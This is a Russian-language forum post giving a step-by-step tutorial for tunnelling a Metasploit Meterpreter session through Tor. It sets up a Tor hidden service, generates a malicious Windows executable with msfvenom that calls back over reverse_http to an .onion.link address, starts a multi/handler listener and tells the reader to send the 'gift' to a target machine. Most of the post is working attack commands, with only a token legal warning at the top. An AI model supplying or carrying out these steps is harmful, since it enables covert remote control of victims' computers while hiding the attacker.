Meterpreter через TOR [Простое решение]

Meterpreter через TOR [Простое решение]

Hlink

Уголовно наказуемо! Статья 272.​


Доброго времени суток форумчане!

Эта тема для тех кто искал но не находил решение вопроса - а как же пустить сессию meterpreter через сеть тор

Требования:

  • Metasploit
  • tor (Expert Bundle)
  • Созданный сайт в сети tor
  • Не много терпения и капельку мозгов

Устанавливаем Metasploit если его еще нету!

Скачиваем tor:

Bash:

apt install tor

Заходим в файл конфигурации "torrc":

Bash:

nano /etc/tor/torrc

Находим и раскомментируем строчки до вида:

Код:

HiddenServiceDir /var/lib/tor/hidden_service/
HiddenServicePort 80 127.0.0.1:9999

Перезапускаем сервис:

Bash:

sudo service tor restart

Узнаем полученый домен:

Bash:

sudo cat /var/lib/tor/hidden_service/hostname

Я думаю что для многих понятно что этим мы создали свой сайт в сети tor.

Теперь перейдем к metasploit'у.

Создадим наш вредоносный полезный файл:

Bash:

msfvenom -p windows/meterpreter/reverse_http LHOST=*******************.onion.link LPORT=80 -o payload.exe -f exe

Вместо звёздочек вводим полученную нами .onion ссылку.

Важно что бы ссылка заканчивалась на .onion.link

СПОЙЛЕР: LINK

Запустим слушателя:

Bash:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_http
set LHOST 192.168.1.1 (Не обязательно что будет такой же )
set LPORT 9999
exploit

Отправляем наш подарок на машину и ждем сессию.

Надеюсь что тема хоть кому нибудь пригодиться)